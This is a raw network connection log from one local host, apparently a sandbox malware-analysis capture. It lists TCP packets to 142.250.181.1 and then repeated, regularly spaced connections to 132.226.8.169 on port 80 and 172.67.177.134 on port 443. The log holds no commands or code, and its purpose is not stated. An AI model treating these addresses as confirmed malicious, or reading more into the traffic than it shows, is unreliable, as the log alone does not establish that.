Nov 25, 2024 18:43:45.790014982 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.794341087 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.794450045 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.794487953 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.794540882 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.798814058 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.798891068 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.798909903 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.798969030 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.803329945 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.803407907 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.807195902 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.807260990 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.807287931 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.807328939 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.811254978 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.811326981 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.811351061 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.811408043 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.815093040 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.815176964 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.815248966 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.815299034 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.819344044 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.819402933 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.823043108 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.823214054 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.823221922 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.823271990 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.827131033 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.827189922 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.827208042 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.827259064 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.831243992 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.831301928 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.831341028 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.831388950 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.833278894 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.833328962 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.835419893 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.835470915 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.846499920 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.846558094 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.846576929 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.846621037 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.847572088 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.847625017 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.847646952 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.847695112 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.873948097 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.874027967 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.874821901 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.874878883 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.874912024 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.874963999 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.877243996 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.877295971 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.890887022 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.890949011 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.891506910 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.891572952 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.891619921 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.891674042 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.893682003 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.893740892 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.912447929 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.912512064 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.912525892 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.912570000 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.913500071 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.913558006 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.915453911 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.915513039 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.933398008 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.933451891 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.933489084 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.933537006 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.934832096 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.934884071 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.935055017 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.935105085 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.943634987 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.943689108 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.943721056 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.943769932 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.944674015 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.944739103 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.944751978 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.944797993 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.947587967 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.947644949 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.947663069 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.947716951 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.949744940 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.949799061 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.949956894 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.950011969 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.951778889 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.951834917 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.952547073 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.952596903 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.952656984 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.952703953 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.954741001 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.954794884 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.958267927 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.958326101 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.958456039 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.958513975 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.959445000 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.959505081 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.960927963 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.960990906 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.961601019 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.961652040 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.961704969 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.961808920 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.963469028 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.963522911 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.963614941 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.963660955 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.965744972 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.965816021 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.965821981 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.965872049 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.967669010 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.967757940 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.967762947 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.967804909 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.969990969 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.970056057 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.970083952 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.970139980 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.971765995 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.971832991 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.971878052 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.971932888 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.973505974 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.973561049 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.997879982 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.997942924 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.997986078 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.998040915 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.998684883 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.998735905 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.998761892 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.998806953 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.000499964 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.000551939 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.002356052 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.002405882 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.012537003 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.012592077 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.012629986 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.012675047 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.012717009 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.012765884 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.012790918 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.012845993 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.012880087 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.012928963 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.013181925 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.013230085 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.013279915 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.013331890 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.014964104 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.015016079 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.015109062 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.015156984 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.016655922 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.016705990 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.018445969 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.018497944 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.018522978 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.018573999 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.020128012 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.020176888 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.020256996 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.020303965 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.021887064 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.021940947 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.022145987 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.022193909 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.023590088 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.023653984 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.025331020 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.025384903 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.025434971 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.025482893 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.025516033 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.025568962 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.027209997 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.027259111 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.029022932 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.029078960 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.029098988 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.029144049 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.030714035 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.030770063 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.030841112 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.030891895 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.032437086 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.032490015 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.032568932 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.032618999 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.034236908 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.034291029 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.035917997 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.035969019 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.036037922 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.036086082 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.037662983 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.037715912 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.037741899 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:46.037748098 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:46.037791014 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:47.300899982 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:47.426578999 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:47.426676989 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:47.426933050 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:47.554609060 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:49.643846035 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:49.684931040 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:49.734540939 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:49.862057924 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:50.262223005 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:50.306241035 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:50.755023956 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:50.755075932 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:50.755179882 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:50.757044077 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:50.757061005 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.141367912 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.141452074 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:52.146697044 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:52.146713972 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.147162914 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.152823925 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:52.195336103 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.754244089 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.754410982 CET	443	49789	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:52.754548073 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:52.759282112 CET	49789	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:52.765492916 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:52.956336021 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:53.326154947 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:53.328265905 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:53.328309059 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:53.328389883 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:53.328680038 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:53.328692913 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:53.368841887 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:54.639983892 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:54.641685963 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:54.641702890 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:55.108731985 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:55.108880997 CET	443	49795	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:55.108928919 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:55.116291046 CET	49795	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:55.127557993 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:55.129204035 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:55.269128084 CET	80	49802	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:55.269313097 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:55.269469976 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:55.269479036 CET	80	49780	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:55.269541025 CET	49780	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:55.405689955 CET	80	49802	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:57.540918112 CET	80	49802	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:57.544280052 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:57.544306993 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:57.544399977 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:57.544652939 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:57.544661999 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:57.587487936 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:58.786951065 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:58.788722038 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:58.788738012 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:59.244191885 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:59.244364023 CET	443	49808	172.67.177.134	192.168.2.5
Nov 25, 2024 18:43:59.244792938 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:59.245179892 CET	49808	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:43:59.248795033 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:59.249819040 CET	49812	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:59.380817890 CET	80	49812	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:59.381136894 CET	80	49802	132.226.8.169	192.168.2.5
Nov 25, 2024 18:43:59.381290913 CET	49802	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:59.381308079 CET	49812	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:59.381455898 CET	49812	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:43:59.505521059 CET	80	49812	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:01.122101068 CET	80	49812	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:01.127351999 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:01.127372980 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:01.127480984 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:01.127733946 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:01.127741098 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:01.165637016 CET	49812	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:02.389621973 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:02.391745090 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:02.391768932 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:02.858642101 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:02.858793974 CET	443	49815	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:02.858861923 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:02.859273911 CET	49815	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:02.863270998 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:02.983724117 CET	80	49821	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:02.983843088 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:02.985614061 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:03.106173038 CET	80	49821	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:04.714910984 CET	80	49821	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:04.716144085 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:04.716213942 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:04.716308117 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:04.716548920 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:04.716569901 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:04.759473085 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:05.988058090 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:05.990005970 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:05.990037918 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:06.452080965 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:06.452156067 CET	443	49827	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:06.452217102 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:06.452714920 CET	49827	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:06.457345963 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:06.458136082 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:06.588298082 CET	80	49821	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:06.588354111 CET	49821	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:06.588439941 CET	80	49831	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:06.588505030 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:06.588623047 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:06.716006041 CET	80	49831	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:08.091618061 CET	80	49831	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:08.098970890 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:08.099009037 CET	443	49834	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:08.099092007 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:08.099544048 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:08.099556923 CET	443	49834	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:08.134352922 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:09.364381075 CET	443	49834	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:09.366200924 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:09.366219044 CET	443	49834	172.67.177.134	192.168.2.5
